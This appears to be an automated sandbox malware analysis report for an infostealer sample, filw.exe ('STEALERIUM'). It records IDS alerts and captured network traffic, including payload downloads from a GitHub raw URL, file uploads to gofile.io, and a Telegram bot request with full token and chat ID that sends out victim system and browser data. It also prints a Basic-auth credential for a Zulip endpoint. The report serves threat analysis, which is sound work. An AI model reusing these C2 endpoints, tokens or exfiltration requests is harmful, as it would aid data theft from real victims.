Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdb source: filw.exe, 00000000.00000002.2005115328.0000019D2B820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.polly.pdb.compressed source: filw.exe
Source:	Binary string: e_sqlite3Acostura.e_sqlite3.dll.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed+microsoft.data.sqliteYcostura.microsoft.data.sqlite.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: filw.exe
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: filw.exe, 00000000.00000002.2004857913.0000019D2B800000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12B41000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2003547527.0000019D2B300000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: filw.exe
Source:	Binary string: costura.polly.pdb.compressed\|\|\|Polly.pdb\|6E4429D15FBCD96C44E391E109CB500EC2508333\|83400 source: filw.exe
Source:	Binary string: costura.polly.core.pdb.compressed\|\|\|Polly.Core.pdb\|C1D3F2BA348EA2F6635B8F5961AD127E831487C6\|66148 source: filw.exe
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed\|\|\|ICSharpCode.SharpZipLib.pdb\|E1FCA83029D1440F54FB3747B240365A6DF0A598\|121652 source: filw.exe
Source:	Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdb source: filw.exe, 00000000.00000002.2003583949.0000019D2B310000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.polly.core.pdb.compressed source: filw.exe

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49858 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://api.telegram.org/bot

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /servers HTTP/1.1Host: api.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /uploadfile HTTP/1.1Content-Type: multipart/form-data; boundary="af5f04a7-5b6e-45e9-97dc-d08d7c2466d8"Host: store-eu-par-1.gofile.ioContent-Length: 192801Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/sendMessage?chat_id=6967646440&text=%60%60%60%0A%F0%9F%94%8D%20%2ASTEALERIUM%20v3.7.1%20REPORT%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%93%85%20Date%3A%202025-02-08%2012%3A34%3A10%20pm%0A%F0%9F%96%A5%EF%B8%8F%20System%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0A%F0%9F%91%A4%20Username%3A%20user%0A%F0%9F%92%BB%20CompName%3A%20088753%0A%F0%9F%8C%90%20Language%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%9B%A1%EF%B8%8F%20Antivirus%3A%20Windows%20Defender%0A%0A%2AHARDWARE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%E2%9A%A1%20CPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0A%F0%9F%8E%AE%20GPU%3A%209ZWORAW%0A%F0%9F%93%8A%20RAM%3A%204095MB%0A%F0%9F%94%8B%20Power%3A%20NoSystemBattery%20%28100%25%29%0A%F0%9F%93%BA%20Screen%3A%201280x1024%0A%F0%9F%93%B7%20Webcams%3A%200%0A%0A%2ANETWORK%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%F0%9F%8C%90%20Gateway%20IP%3A%20192.168.2.1%0A%F0%9F%94%92%20Internal%20IP%3A%20192.168.2.4%0A%F0%9F%8C%8D%20External%20IP%3A%208.46.123.189%0A%0A%2ADETECTED%20DOMAINS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20-%20%F0%9F%8F%A6%20Banking%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20Crypto%20Services%20%28No%20data%29%0A%20%20%20-%20%F0%9F%94%9E%20Adult%20Websites%20%28No%20data%29%0A%0A%2ABROWSER%20DATA%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%F0%9F%8D%AA%20Cookies%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%93%9C%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%2ASOFTWARE%20%26%20ACCOUNTS%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%0A%2ADEVICE%20INFORMATION%2A%0A%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%E2%94%81%0A%20%20%20%E2%88%9F%20%F0%9F%94%91%20Windows%20Key%0A%20%20%20%E2%88%9F%20%F0%9F%96%BC%EF%B8%8F%20Desktop%20Shot%0A%0A%2
Source: global traffic	HTTP traffic detected: POST /api/v1/messages HTTP/1.1Authorization: Basic c3p1cnVib29ydUBnbWFpbC5jb206Zmd3VDV1bWJyUWRXNlkxYnVJV1pKSzZTMkZWUVpBZVM=Content-Type: application/x-www-form-urlencodedHost: szurubooru.zulipchat.comContent-Length: 3416Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 20.110.205.119 20.110.205.119

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49817 -> 104.16.185.241:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 185.199.108.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 185.199.108.133:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49818 -> 185.199.108.133:443
Source: Network traffic	Suricata IDS: 2029323 - Severity 1 - ET MALWARE Possible Generic RAT over Telegram API : 192.168.2.4:49858 -> 149.154.167.220:443

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 23.209.72.17
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.219
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 23.57.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.14

Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7043342993:AAH3tTE7nerxLSr5-SkYKVrmJwCoBBaGRCU/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1Host: raw.githubusercontent.com
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.b70cb75853005ad9eaf6.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 848sec-ch-ua-arch: "x86"sec-ch-viewport-width: 986sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=2B6D2E5290944EA3AB54A4F3A43E66C5.RefC=2025-02-08T17:34:27Z; USRLOC=; MUID=376DBFAC669E6C6408F0AA2167EC6DB1; MUIDB=376DBFAC669E6C6408F0AA2167EC6DB1; _EDGE_S=F=1&SID=25B4AE51041962121EE7BBDC05666308; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.8ed343c804e9069b52b4.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 848sec-ch-ua-arch: "x86"sec-ch-viewport-width: 986sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=2B6D2E5290944EA3AB54A4F3A43E66C5.RefC=2025-02-08T17:34:27Z; USRLOC=; MUID=376DBFAC669E6C6408F0AA2167EC6DB1; MUIDB=376DBFAC669E6C6408F0AA2167EC6DB1; _EDGE_S=F=1&SID=25B4AE51041962121EE7BBDC05666308; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.f30eb488fb3069c7561f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.36a9f5e4ed2130582a90.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.1a931d3ad0845b9189ad.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=376DBFAC669E6C6408F0AA2167EC6DB1; _EDGE_S=F=1&SID=25B4AE51041962121EE7BBDC05666308; _EDGE_V=1
